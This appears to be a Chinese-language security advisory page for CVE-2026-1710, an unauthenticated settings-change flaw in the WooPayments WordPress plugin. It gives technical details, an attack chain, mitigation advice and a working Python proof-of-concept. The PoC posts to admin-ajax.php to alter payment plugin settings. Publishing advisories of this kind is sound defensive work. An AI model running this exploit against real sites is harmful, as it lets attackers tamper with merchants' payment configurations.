CVE-2026-1710 CVSS 6.5 中危

CVE-2026-1710 WooPayments插件权限绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1710

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WooPayments (WooCommerce Payments) Plugin

漏洞概述

WordPress的WooPayments插件在10.5.1及以下版本中存在权限绕过漏洞。由于`save_upe_appearance_ajax`函数缺少关键的能力检查，未经身份验证的攻击者可利用此漏洞通过网络篡改插件配置。攻击过程无需用户交互，成功利用可能导致系统完整性受损，建议管理员立即采取修复措施以确保安全。

技术细节

该漏洞的核心在于WordPress插件中对AJAX请求处理的权限验证缺失。在WooPayments插件的受影响版本中，`save_upe_appearance_ajax`函数被注册为处理AJAX请求的回调，旨在保存用户界面外观设置。然而，开发者在实现该功能时，未在函数内部添加`current_user_can()`等权限校验逻辑，或未正确限制该AJAX动作仅对已认证管理员开放。这导致攻击者无需登录WordPress后台，仅需向`/wp-admin/admin-ajax.php`端点发送精心构造的HTTP POST请求，并在请求体中设置`action`参数为`save_upe_appearance_ajax`，即可触发设置更新逻辑。攻击者可利用此机制修改支付网关的关键参数（如支付状态、显示设置等），从而破坏系统的完整性和可用性，造成潜在的财务风险或服务中断。

攻击链分析

STEP 1

侦察

识别使用WooPayments插件且版本低于或等于10.5.1的WordPress网站。

STEP 2

武器化

构造包含`action=save_upe_appearance_ajax`及恶意参数的HTTP POST请求数据包。

STEP 3

投递

将构造好的恶意请求发送至目标网站的`/wp-admin/admin-ajax.php`接口。

STEP 4

利用

由于目标系统缺少权限校验，服务器直接执行`save_upe_appearance_ajax`函数，更新插件设置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-1710: Unauthorized modification of settings in WooPayments.
    """
    # The endpoint for WordPress AJAX requests
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Payload targeting the vulnerable function
    payload = {
        'action': 'save_upe_appearance_ajax',
        'is_button_enabled': 'false', # Malicious parameter to alter settings
        'theme': 'dark'               # Another potential setting
    }
    
    try:
        print(f"[*] Sending request to {ajax_url}...")
        response = requests.post(ajax_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if settings were modified.")
            print(f"[+] Response body: {response.text[:200]}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://example.com"
    exploit_poc(target)

影响范围

WooPayments <= 10.5.1

防御指南

临时缓解措施

如果不能立即升级插件，建议暂时禁用WooPayments插件以停止服务，或者通过服务器配置（如Apache的.htaccess或Nginx规则）阻止未授权用户对`/wp-admin/admin-ajax.php`提交包含`action=save_upe_appearance_ajax`的请求，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表